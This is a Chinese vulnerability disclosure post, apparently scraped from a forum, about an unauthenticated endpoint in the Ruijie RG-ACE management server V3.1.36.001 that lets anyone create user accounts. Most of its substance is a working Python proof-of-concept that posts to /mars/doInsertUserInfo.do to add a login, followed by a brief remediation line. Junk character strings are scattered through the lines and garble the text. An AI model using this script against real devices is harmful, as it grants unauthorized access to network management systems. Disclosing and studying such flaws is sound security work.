锐捷应用控制引擎管理服务器可以增加用户

admin

锐捷应用控制引擎管理服务器（RG-ACE系列应用控制引擎管理服务器V3.1.36.001，官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版）可以根据没有权限验证的接口直接增加用户，连接设备，查看设备信息和报表（权限相对于默认的admin比较低）

0 m8 |. ~( {) V
, m# d2 V9 ?( E测试的具体版本是
9 N8 L' S! |: C6 V8 ^+ j4 ]产品名称: 锐捷应用控制引擎
版本号: 3.1.36.001 TC
编译时间: 201104291730


/ g2 F9 m* y( E* j: y漏洞证明：
% F, m- P. `3 w3 ~; R4 h6 x8 [7 M
7 Y1 t( e4 ^; S7 ~
) f) b( Z3 s: [& t! W
3 R. {6 r9 p* e0 J# Q/ B% v

* x* R3 W6 c: M
* Y3 m1 Z" m# |. q0 q, i; }执行脚本
" z9 d6 \/ P* L2 S+ |: Q#! /usr/bin/env python
  J& q' [7 s- ]. f. O: r7 J3 S, i8 w#coding=gbk
#RG-ACE管理服务器 V3.1.36.001
import urllib2, urllib,cookielib
url=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
& |* ?0 f2 {4 Nopener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
. A7 A. f" a5 hopener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]
  b6 i% J( X) T% N9 G2 M( p  mpost=(("event","userManager.doInsertUserInfo"),
( y7 O9 d4 ^/ R: H("useractionname","addButtonValue"),
+ ^1 s1 a0 A1 [! E9 h( ~% f("useropermanager","userManager"),
; Q  I3 Z; h0 N# j  A("userName","t"), #######账号自己加
) e2 v$ d# b6 O8 Q2 O("pwd","aaaaaa"),######密码自己加
("trueName","ad"),
% i5 j* G3 L. H, M3 Q("email",""),
("mobilePhone",""),
("officePhone",""),
' V" X% I2 U; I* G1 B7 x. V("addr",""),
8 x" T8 M/ J3 `) f* A& n("submit","确定"))
urllib2.install_opener(opener)
1 T0 I8 S9 h/ X, ^, R* {p=urllib2.urlopen(url, urllib.urlencode(post)).read()
. n1 s' r- B# R) Y  R& ~1 |print "Done"
0 e8 _' c7 h  |- \5 j4 w" b
7 S: w! f, @2 i* Z  p3 W7 A' J- a$ z# T登录，连接设备



( M3 G9 G% H$ e

默认的管理员admin权限更大点
! m4 d1 g! ^& m


. j+ Y% r% e9 z' i5 P$ C% ]
" I* B$ G; j' M0 Q
4 v0 t: E& x1 K* `修复方案：
加强对接口的权限验证

. y1 X/ B1 E$ l0 y8 P+ K8 y